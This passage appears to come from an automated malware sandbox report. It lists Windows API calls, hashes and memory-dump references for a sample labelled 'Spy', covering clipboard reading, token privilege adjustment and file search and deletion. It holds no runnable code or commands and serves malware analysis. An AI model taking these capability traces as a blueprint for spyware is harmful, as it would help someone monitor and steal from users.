                                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                      • Instruction Fuzzy Hash: 1EF0FE7150010DFFDF05CF90C941EAA7BB9FB19314F108589F9154B251D336DA21AB91
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
                                                      • Instruction ID: d53bfdf15d4f0b9c29b79626606486a5a269dabebfa8db58de4dce5339236fac
                                                      • Opcode Fuzzy Hash: 2b0684b30d22d6ccf35d52289e8c8aa55b90ee3c71b07a68b3c6209116a8fa3e
                                                      • Instruction Fuzzy Hash: 90E08632A0012857CB21A6989C15FEA77DDDB89690F0441B6FC09D7205D9649C818691
                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00AE4D31
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FolderPath_memmove
                                                      • String ID:
                                                      • API String ID: 3334745507-0
                                                      • Opcode ID: 25a4a9c9c2c3edf6f897ab2140deb7d782a2f38fda20d0d1a1105a3e8808b025
                                                      • Instruction ID: 058504ee329e1b6ea1417c6be52e765e3b6e51ecba8848ba248fce0a22fca49e
                                                      • Opcode Fuzzy Hash: 25a4a9c9c2c3edf6f897ab2140deb7d782a2f38fda20d0d1a1105a3e8808b025
                                                      • Instruction Fuzzy Hash: 76D05EA191032C2BDF60E6A49C4DDF77BACD744220F004AA17C5DC3201ED649D8586E0
                                                      APIs
                                                        • Part of subcall function 00AE384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00AE3959,00000000,00000000,?,00AD05DB,00B38070,00000002,?,?), ref: 00AE38CA
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00AD05DB,00B38070,00000002,?,?,?,00000000), ref: 00AE3967
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID:
                                                      • API String ID: 539440098-0
                                                      • Opcode ID: 48c26b4d6d3c76bb2fce32298c66a83a329b923533751280feb823b38c5f6334
                                                      • Instruction ID: 80909e5342a4b0f6a59f9f7e6caaddb7bb24663887b003165bd5904ea9229fc7
                                                      • Opcode Fuzzy Hash: 48c26b4d6d3c76bb2fce32298c66a83a329b923533751280feb823b38c5f6334
                                                      • Instruction Fuzzy Hash: 70E04636410208BBDB20AF94D805ADABBBCEB04320F00465AFD4092111DBB2AE249BA0
                                                      APIs
                                                      • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00AE3E7D,?,?,?), ref: 00AE3F0D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: 19dea65157466de2f4a28cbcf52a23ea65cba4dc80edfa283f670791c904db7e
                                                      • Instruction ID: b7dff1d0132427ed9001093da6090c0a891256a9ff64927d558ac2f8a99036c4
                                                      • Opcode Fuzzy Hash: 19dea65157466de2f4a28cbcf52a23ea65cba4dc80edfa283f670791c904db7e
                                                      • Instruction Fuzzy Hash: 3ED0A7315E020CFBEF50DFA0CC06FA8B7ACE701706F1002A4B504DA0E0DAB269149795
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00AD06E6,00000000,00000000,00000000), ref: 00A942BF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3a12be7279665c7582be239ebc77113240a3ae1c9c57ef3a34b4eaaf678b49d0
                                                      • Instruction ID: 3efcad15fc77a68d808b8fee9489afd583f84db827802e9ef72b6292a60756e4
                                                      • Opcode Fuzzy Hash: 3a12be7279665c7582be239ebc77113240a3ae1c9c57ef3a34b4eaaf678b49d0
                                                      • Instruction Fuzzy Hash: 9FD0C77465020CBFE710DB80DC46FA9777CE705710F500194FD04A7290D6F27D508795
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
                                                      • Instruction ID: 5c7a99cd2f07ca23f7313d6381f969afd1ec1037681a2214d3d58ee2be4aa052
                                                      • Opcode Fuzzy Hash: 59889acb79ad1f1d202264b3c698c0ac49d61f55ebe38878e4a4d04ae9eb1242
                                                      • Instruction Fuzzy Hash: 15B09234010680669D282F3D19480993309584AFA97D81B81E878964E1D6398C9BA620
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: d6de6d45c2de5ddde6210d01d3a8bb494f2b3a1d0042ca9c7e7816ab69a623c1
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 1BB0927684020CB7CE012A92EC03A593F2A9B45668F408020FB0C1D1A2A673A6A09689
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00AED842
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 7550610b8ff722b4929b1d27947fa7d7ce95eb71a37aea3191ca0544f7b9e45d
                                                      • Instruction ID: 588e455019eb99e0565d97d8f480aaf83ecdab010a75476c8026eaee5559b3ea
                                                      • Opcode Fuzzy Hash: 7550610b8ff722b4929b1d27947fa7d7ce95eb71a37aea3191ca0544f7b9e45d
                                                      • Instruction Fuzzy Hash: B07172312043428FCB14EF69D591A6EB7F1AF89354F44462DF8969B3A2DB30ED05CB52
                                                      APIs
                                                        • Part of subcall function 00AE4005: FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                        • Part of subcall function 00AE4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                        • Part of subcall function 00AE4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE40DD
                                                        • Part of subcall function 00AE4005: FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                      • GetLastError.KERNEL32 ref: 00AEC292
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2191629493-0
                                                      • Opcode ID: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
                                                      • Instruction ID: 5528a1b425f8e984cd7aeb058abd1cc296c5ac1500cf37031647d98e1c3bd0dc
                                                      • Opcode Fuzzy Hash: 6a701b823c39c168b2c16dc61a78a77f5e628669447dac13a6277959483e7517
                                                      • Instruction Fuzzy Hash: 90F082312101104FCB10FF59D950B59B7E5AF48320F058419F9058B352CB74BC01CB94
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,00000000,00AC2F8B), ref: 00A942EF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: a19e67afce6349a3b7c7e9e49b41df41f17bc301c49ede830518798bf6b06166
                                                      • Instruction ID: b456a6f92970c8e3c8cdc4339a06a00f5c7fa80290e953198b577721e2005106
                                                      • Opcode Fuzzy Hash: a19e67afce6349a3b7c7e9e49b41df41f17bc301c49ede830518798bf6b06166
                                                      • Instruction Fuzzy Hash: C7E0B675504B01CFC7314F1AE804892FBF8FFE93713214A2EE0E692660E7B0589ACB50
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B0D208
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D249
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B0D28E
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D2B8
                                                      • SendMessageW.USER32 ref: 00B0D2E1
                                                      • _wcsncpy.LIBCMT ref: 00B0D359
                                                      • GetKeyState.USER32(00000011), ref: 00B0D37A
                                                      • GetKeyState.USER32(00000009), ref: 00B0D387
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0D39D
                                                      • GetKeyState.USER32(00000010), ref: 00B0D3A7
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0D3D0
                                                      • SendMessageW.USER32 ref: 00B0D3F7
                                                      • SendMessageW.USER32(?,00001030,?,00B0B9BA), ref: 00B0D4FD
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B0D513
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B0D526
                                                      • SetCapture.USER32(?), ref: 00B0D52F
                                                      • ClientToScreen.USER32(?,?), ref: 00B0D594
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B0D5A1
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B0D5BB
                                                      • ReleaseCapture.USER32 ref: 00B0D5C6
                                                      • GetCursorPos.USER32(?), ref: 00B0D600
                                                      • ScreenToClient.USER32(?,?), ref: 00B0D60D
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D669
                                                      • SendMessageW.USER32 ref: 00B0D697
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D6D4
                                                      • SendMessageW.USER32 ref: 00B0D703
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B0D724
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B0D733
                                                      • GetCursorPos.USER32(?), ref: 00B0D753
                                                      • ScreenToClient.USER32(?,?), ref: 00B0D760
                                                      • GetParent.USER32(?), ref: 00B0D780
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0D7E9
                                                      • SendMessageW.USER32 ref: 00B0D81A
                                                      • ClientToScreen.USER32(?,?), ref: 00B0D878
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B0D8A8
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0D8D2
                                                      • SendMessageW.USER32 ref: 00B0D8F5
                                                      • ClientToScreen.USER32(?,?), ref: 00B0D947
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B0D97B
                                                        • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B0DA17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
                                                      • Instruction ID: 5546b940ad849119a175da31937fd9bc43fc1b19de6ac12d745db6b131f3aeba
                                                      • Opcode Fuzzy Hash: 1a5928f4b1d00cced863c5f5da6f3c3cc8b14150aa4660c4805eb65e16fb5368
                                                      • Instruction Fuzzy Hash: F8429C34208341AFD720DFA8C884BAABFE5FF89310F144699F695972E0CB719D55CB92
                                                      APIs
                                                        • Part of subcall function 00AD9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                        • Part of subcall function 00AD9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                        • Part of subcall function 00AD9399: GetLastError.KERNEL32 ref: 00AD941D
                                                      • _memset.LIBCMT ref: 00AD8F71
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AD8FC3
                                                      • CloseHandle.KERNEL32(?), ref: 00AD8FD4
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AD8FEB
                                                      • GetProcessWindowStation.USER32 ref: 00AD9004
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00AD900E
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AD9028
                                                        • Part of subcall function 00AD8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                        • Part of subcall function 00AD8DE9: CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 79ebb23a6f589bfaab99d2c65ff81f105633b4e6bde4d0fd3b0665e1af3839d0
                                                      • Instruction ID: 5c47f9dc3cb9f6b98aed8cf64ade4648265de9fc25772cb8096d7465246df121
                                                      • Opcode Fuzzy Hash: 79ebb23a6f589bfaab99d2c65ff81f105633b4e6bde4d0fd3b0665e1af3839d0
                                                      • Instruction Fuzzy Hash: E4816A71900209BFDF51EFA4CD49AEF7B79BF08304F04825AF916A62A1DB718E55DB20
                                                      APIs
                                                      • OpenClipboard.USER32(00B10980), ref: 00AF465C
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AF466A
                                                      • GetClipboardData.USER32(0000000D), ref: 00AF4672
                                                      • CloseClipboard.USER32 ref: 00AF467E
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AF469A
                                                      • CloseClipboard.USER32 ref: 00AF46A4
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00AF46B9
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00AF46C6
                                                      • GetClipboardData.USER32(00000001), ref: 00AF46CE
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AF46DB
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00AF470F
                                                      • CloseClipboard.USER32 ref: 00AF481F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
                                                      • Instruction ID: e71e18f3101d6eea935697294bee18b019bee378737219a6774954d2b304eeca
                                                      • Opcode Fuzzy Hash: 8be1e80bba5744ca091f5186625e02c5340d35c3a69a040fb8880177f2e69b41
                                                      • Instruction Fuzzy Hash: FD518171244206ABD700FFA0DD89FBF77A8AF98B51F404529F646D31A1DFB0D9448BA2
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AECDD0
                                                      • FindClose.KERNEL32(00000000), ref: 00AECE24
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE49
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AECE60
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AECE87
                                                      • __swprintf.LIBCMT ref: 00AECED3
                                                      • __swprintf.LIBCMT ref: 00AECF16
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • __swprintf.LIBCMT ref: 00AECF6A
                                                        • Part of subcall function 00AA38C8: __woutput_l.LIBCMT ref: 00AA3921
                                                      • __swprintf.LIBCMT ref: 00AECFB8
                                                        • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA3943
                                                        • Part of subcall function 00AA38C8: __flsbuf.LIBCMT ref: 00AA395B
                                                      • __swprintf.LIBCMT ref: 00AED007
                                                      • __swprintf.LIBCMT ref: 00AED056
                                                      • __swprintf.LIBCMT ref: 00AED0A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                      • Instruction ID: 79766f632569b2411f109f9ee61d622aef513cc15efba6ce5729100eb7763db3
                                                      • Opcode Fuzzy Hash: 8feff4e4b0864d83ccfc3bbc1b4662c35e6165357becff36366cbe621d03e7ab
                                                      • Instruction Fuzzy Hash: D5A13CB2508345ABC714FFA4CA85DAFB7ECEF98704F400919F58587191EB74EA09CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AEF5F9
                                                      • _wcscmp.LIBCMT ref: 00AEF60E
                                                      • _wcscmp.LIBCMT ref: 00AEF625
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00AEF637
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00AEF651
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AEF669
                                                      • FindClose.KERNEL32(00000000), ref: 00AEF674
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AEF690
                                                      • _wcscmp.LIBCMT ref: 00AEF6B7
                                                      • _wcscmp.LIBCMT ref: 00AEF6CE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEF6E0
                                                      • SetCurrentDirectoryW.KERNEL32(00B3B578), ref: 00AEF6FE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEF708
                                                      • FindClose.KERNEL32(00000000), ref: 00AEF715
